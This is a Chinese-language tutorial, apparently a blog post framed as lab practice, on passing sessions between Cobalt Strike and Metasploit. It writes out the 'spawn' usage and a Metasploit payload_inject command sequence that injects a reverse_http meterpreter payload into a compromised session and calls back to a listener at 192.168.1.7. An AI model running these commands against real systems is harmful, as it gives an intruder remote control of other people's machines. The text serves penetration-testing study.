文中通过详细讲解CobaltStrike工具，更加深入的掌握CobaltStrike用法；文中内容全由个人理解编制，若有错处，大佬勿喷，个人学艺不精；本文中提到的任何技术都源自于靶场练习，仅供学习参考，请勿利用文章内的相关技术从事非法测试，如因产生的一切不良后果与文章作者无关。

Cobalt Strike 与 MSF联动

使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构（如：x86，x64）和一个监听器作为其参数。默认情况下， spawn 命令会在 rundll32.exe 中派生一个会话。
首先新建立了一个9999端口的监听器：

spawn 监听器名

使用spawn生成新的会话，而且这个会话调用的是rundll32.exe,是在内存中运行的dll文件：

在我们的渗透测试中，通常会使用到将CS生成的session派生至我们的MSF中，反之也是一样。
注：这里不论是CS->MSF 还是MSF->CS ,在MSF中使用的payload都是HTTP的，而非TCP：

CS->MSF：

我们首先在MSF建立监听：

在CS中使用foreign建立外部监听：

然后利用spawn将CS会话派生至MSF中：

spawn CS->MSF 

MSF ->CS

将msf中的session反弹到CS上，我们需要使用 payload_inject 模块：

use windows/local/payload_inject
set disablepayloadhandler true # 注：这条很重要，主要目的是禁止msf监听
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.7
set lport 7777
set session 1
exploit

同样在CS中建立一个监听：

执行后，成功回连：